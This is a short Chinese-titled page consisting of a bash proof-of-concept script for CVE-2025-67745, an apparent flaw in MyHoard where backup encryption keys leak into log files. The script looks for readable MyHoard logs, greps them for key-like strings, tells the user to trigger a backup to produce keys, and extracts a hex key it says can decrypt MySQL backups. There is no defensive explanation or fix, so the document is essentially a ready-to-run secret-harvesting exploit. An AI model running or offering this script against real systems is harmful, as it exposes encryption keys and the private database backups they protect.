CVE-2025-67745 MyHoard备份信息泄露漏洞

#!/bin/bash # CVE-2025-67745 PoC - MyHoard Encryption Key Leak # This PoC demonstrates how to extract encryption keys from MyHoard logs TARGET_HOST="${TARGET_HOST:-localhost}" LOG_FILE="/var/log/myhoard/myhoard.log" # Step 1: Check if MyHoard logs are accessible echo "[*] Checking MyHoard log access..." if [ ! -r "$LOG_FILE" ]; then echo "[-] Log file not accessible. Try alternative locations:" echo " - /var/log/myhoard/" echo " - /tmp/myhoard.log" echo " - ~/.myhoard/logs/" exit 1 fi # Step 2: Search for encryption keys in logs echo "[*] Searching for backup encryption keys..." ENCRYPTION_KEYS=$(grep -E '(encryption_key|encryptionKey|AES|backup_key)' "$LOG_FILE" 2>/dev/null) if [ -z "$ENCRYPTION_KEYS" ]; then echo "[-] No encryption keys found in current logs" echo "[*] Try triggering a backup operation first:" echo " myhoard --backup --database=test_db" exit 1 fi # Step 3: Extract and display keys echo "[+] Found potential encryption keys:" echo "$ENCRYPTION_KEYS" | while read line; do echo " $line" done # Step 4: Verify key validity echo "[*] Validating key format..." KEY=$(echo "$ENCRYPTION_KEYS" | head -1 | grep -oE '[a-fA-F0-9]{32,}' | head -1) if [ ! -z "$KEY" ]; then echo "[+] Valid encryption key extracted: $KEY" echo "[!] This key can be used to decrypt MySQL backups" fi